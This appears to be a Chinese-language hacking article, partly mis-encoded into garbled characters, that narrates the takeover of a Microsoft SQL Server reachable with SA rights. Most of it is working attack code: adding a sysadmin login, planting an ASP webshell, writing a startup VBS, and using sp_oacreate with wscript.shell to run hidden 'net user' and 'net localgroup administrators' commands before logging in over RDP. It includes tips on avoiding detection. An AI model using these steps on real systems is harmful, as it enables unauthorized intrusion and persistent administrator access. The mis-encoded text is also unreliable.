朋友叫我?guī)兔纯?，這樣和管理員的直接攻防較量我還沒嘗試過，所以也就答應(yīng)了！
　　因為是數(shù)據(jù)庫是SA權(quán)限連接的，我首先想到的是利用下面的命令：
exec master.dbo.sp_addlogin renwoxin
我的目的是添加數(shù)據(jù)庫用戶“renwoxin”，然后將將其加入“Sysadmin”組：
Exec master.dbo.sp_addsrvrolemember renwoxin,sysadmin
然后就可以用祭出我們的“屠庫寶刀”——SQL查詢分析器了。開始我還抱著一絲僥幸，希望可以通過：
sp_addextendedproc Xp_cmdshell,@dllname='Xplog70.dll'
添加Xp_cmdshell擴展過程?？上QL輸出如下：
數(shù)據(jù)庫中已存在名為Xp_cmdshell 的對象。
為了確認Xp_cmdshell是否被刪除我提交如下語句：
select count(*) from master.dbo.sysobjects where xtype='X' and name=Xp_cmdshell
返回1，看來并未刪除Xp_cmdshell對象，那問題應(yīng)該是出在Xplog70.dll這個文件了，也許被改名或者刪除了。
我決定用臭要飯的寫的GetWebShell來寫入ASP木馬。工具使用很簡單，以往的黑防也有介紹過。我使用后一會兒就提示寫入成功了，但等我高高興興的去訪問這個路徑時，卻提示“找不到網(wǎng)頁”，郁悶！
　　百思不得其解，拿出NBSI2，利用Tree list工具列出WEB路徑下的文件，發(fā)現(xiàn)上傳的木馬“安詳”地躺在那兒，可為什么不能訪問呢（我現(xiàn)在都還不知道答案，哪位高人知道希望能指點一下），而且錯誤提示居然是“找不到文件”？！
我打算放棄了，可這么好的肉雞就這么飛了，實在心有不甘！到百度一通狂搜，終于找到一篇文章，文中提出了一種方法，用SQL查詢分析器寫入如下指令：
Declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate ’scripting.filesystemobject’, @o out
——這兩行代碼是建立SQL的文本對象
exec sp_oamethod @o, ’createtextfile’, @f out,’c:\docume~1\alluse~1\「開始」菜單\程序\啟動\a.vbs’, 1
－－在啟動菜單里寫入a.vbs，當然這里只支持中文
exec @ret = sp_oamethod @f, ’writeline’, NULL,’set wshshell=createobject("wscript.shell")’
——單引號里的都是a.vbs的內(nèi)容，要一行一行的寫，下同。
exec @ret = sp_oamethod @f, ’writeline’, NULL,’a=wshshell.run ("cmd.exe /c net user user1 123 /add",0)’
exec @ret = sp_oamethod @f, ’writeline’, NULL,’b=wshshell.run ("cmd.exe /c net localgroup administrators user1 /add",0)’
－－a.vbs內(nèi)容結(jié)束
按照作者的說法，執(zhí)行查循后會在服務(wù)器的啟動程序里寫入一個a.vbs腳本。等服務(wù)器重啟就可以添加一個user1密碼為123的用戶。可是要等服務(wù)器重啟，要到哪一天啊?!
對著這段代碼是我是上看、下看、左看、右看，你還別說真看出點什么了。這個腳本用Sp_oamethod來調(diào)用OLE對象的Writeline方法，突然靈光一閃，我能不能用Sp_oamethod來執(zhí)行CMD命令呢？趕緊找出“SQL Server聯(lián)機叢書”，其中對Sp_OAMethod描述如下：
sp_OAMethod
調(diào)用 OLE 對象的方法。
語法
sp_OAMethod objecttoken,
????methodname
????[, returnvalue OUTPUT]
????[ , [ @parametername = ] parameter [ OUTPUT ]
????[...n]]
參數(shù)
objecttoken
是先前用 sp_OACreate 創(chuàng)建的 OLE 對象令牌。
methodname
是要調(diào)用的 OLE 對象的方法名。
用WScript.Shell對象的Run方法來運行Cmd.exe不就可以執(zhí)行Cmd命令了嗎？于是構(gòu)造如下語句：
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$ test /add','0','true'

小提示：上面語句的詳細解釋是：
用Sp_OACreate創(chuàng)建OLE 對象Wscript.Shell的令牌。
用Sp_oamethod調(diào)用Wscript.Shell的Run方法來執(zhí)行CMD語句，添加用戶renwoxin$，密碼為test。“0”和“true”是RUN方法的參數(shù)：“0”可選。表示程序窗口外觀的整數(shù)值，表示語句執(zhí)行時隱藏CMD窗口，如果不加的話，在服務(wù)器上會有一個DOS窗口閃一下，容易暴露；“true”可選。布爾值，表示在繼續(xù)執(zhí)行腳本中的下一條語句之前，腳本是否等待執(zhí)行完程序。如果設(shè)為True，則在執(zhí)行完程序后才執(zhí)行腳本，RUN方法返回由程序返回的任何錯誤代碼。如果設(shè)為False（默認值），則RUN方法將自動在啟動程序后立即返回0（不是錯誤代碼）。

上面的代碼執(zhí)行后，SQL查詢分析器返回一個0值，這表示執(zhí)行成功了，再將renwoxin$提升為管理員：
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net localgroup administrators renwoxin$ /add','0','true'
這次又返回一個0值，還等什么，趕快從3389連過去看看，順利進入！大家肯定會想到這個RUN可以執(zhí)行幾乎所有的CMD命令，只是如果你要看到結(jié)果，就需要自己構(gòu)造表來存儲了，大家可以發(fā)揮自己的想象力了！
找到SQL安裝目錄下的Binn文件夾，發(fā)現(xiàn)其中的Xplog70.dll果然被刪除了。再檢查一下，用GetWebShell提交的ASP木馬，內(nèi)容居然是亂碼！反正是不能執(zhí)行，到現(xiàn)在我還是想不通是為什么，希望大俠們能著文傳授。到此文章也該結(jié)束了，希望能盡快看到大俠們的文章。

版權(quán)聲明：本站文章來源標注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。